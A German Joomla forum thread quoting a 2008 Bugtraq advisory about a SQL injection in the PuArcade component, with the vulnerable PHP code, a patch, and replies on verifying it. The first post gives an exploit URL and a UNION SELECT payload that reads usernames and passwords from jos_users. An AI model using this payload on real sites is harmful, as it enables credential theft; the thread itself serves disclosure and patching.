+ Antworten
Ergebnis 1 bis 3 von 3

Thema: Pu Arcade component for Joomla - SQL injection

  1. #1
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    10.592
    Bedankte sich
    152
    Erhielt 2.558 Danksagungen
    in 2.360 Beiträgen

    Standard Pu Arcade component for Joomla - SQL injection

    Auf Bugtraq fand ich folgenden Eintrag (erstellt: 09.04.2008 11:20 Uhr von netmantis.com@gmail.com):


    ###Beginn###
    I discovered a vulnerability in Component PUARCADE for joomla (the last version is vulnerable) .

    SQL Injection vulnerability in puarcade.class.php <= V. 2.2 , component for JOOMLA .
    --------------------------------------------------------------------------------------------------------------------------

    Author : MantiS
    ---------

    Vulnerable code :
    ------------------------
    function warningByGame($gid) {
    global $database;

    $query = "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM
    #__puarcade_games as g, #__puarcade_contentrating as c"
    . " WHERE g.contentratingid = c.id"
    . " AND g.id = $gid";
    $database->setQuery($query);
    $cont = $database->loadObjectList();
    --------------------------

    Exploit : http://website.com/joomla_path/index...&Itemid=1&gid=[SQL
    INJECTION]
    ---------
    Can be exploited with a "0 UNION SELECT password,username,0,0,0 from jos_users--" (5 columns) .

    Patch :
    --------
    Place before "$query = "SELECT c.id......... " :
    $gid = intval($_GET['gid']);
    To force $gid variable conversion at an integer .
    ###Ende###

    Kann das jemand verifizieren?
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!

  2. Erhielt Danksagungen von:


  3. #2
    Gehört zum Inventar Avatar von j!-n
    Registriert seit
    26.07.2007
    Ort
    EA / HH / B
    Beiträge
    5.846
    Bedankte sich
    258
    Erhielt 1.229 Danksagungen
    in 1.155 Beiträgen

    Standard

    Zitat Zitat von keraM Beitrag anzeigen
    Kann das jemand verifizieren?
    Installiers und teste . Ich hab das Ding noch nicht verbaut, und ich denke, die wenigsten können etwas mit dem Exploit anfangen. Auf Milw0rm fliegt sowas auch ständig herum, und es gibt sicher noch ein paar Dutzend, die nirgendwo publiziert sind.
    Joomla kaputt? Gehackt? Migration mißlungen? Datensalat?
    www.joomla-notdienst.de - Soforthilfe & Webentwicklung
    Einsteiger- FAQ - bitte lesen!

  4. #3
    Verbringt hier viel Zeit Avatar von Lemm
    Registriert seit
    01.03.2005
    Ort
    Berlin
    Beiträge
    640
    Bedankte sich
    13
    Erhielt 85 Danksagungen
    in 83 Beiträgen

    Standard

    Zitat Zitat von keraM Beitrag anzeigen
    Kann das jemand verifizieren?

    die sql anweisung so wie sie da steht stimmt und wenn die nicht vorher irgendwo gesichert wird (hab ich noch nicht nachgeschaut) existiert die lücke auch. also besser absichern als nachher gehackt werden. danke für den hinweis
    MfG Lemm
    --------------------------------
    :. http://joomla-clantools.de .::. http://lemmpire.de .::. http://w4sp.de .:
    .:::: AJAX ist auch nur n Putzmittel ::::.

+ Antworten

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein